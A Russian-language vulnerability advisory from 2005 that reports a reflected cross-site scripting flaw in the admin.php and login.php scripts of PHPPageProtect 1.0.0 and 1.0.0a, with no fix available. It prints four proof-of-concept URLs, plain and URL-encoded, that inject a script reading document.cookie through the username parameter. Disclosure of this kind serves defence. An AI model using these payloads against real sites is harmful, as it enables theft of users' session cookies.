Межсайтовый скриптинг в PHPPageProtect

Дата публикации:
20.07.2005
Всего просмотров:
808
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHPPageProtect 1.x
Уязвимые версии: PHPPageProtect 1.0.0, 1.0.0а

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным.

Уязвимость существует в сценариях 'admin.php' и 'login.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL полнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/admin.php?username=">
<script>alert(document.cookie)</script><!--

http://[target]/ [path]/admin.php?username=
%22%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

http://[target]/[path]/login.php?username=">
< script>alert(document.cookie)< /script><!--

http://[target]/[path]/login.php?username=
%22%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

URL производителя: php.warpedweb.net/pageprotect/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHPPageProtect Version 1.0.0 / 1.0.0a XSS POC Exploit

или введите имя

CAPTCHA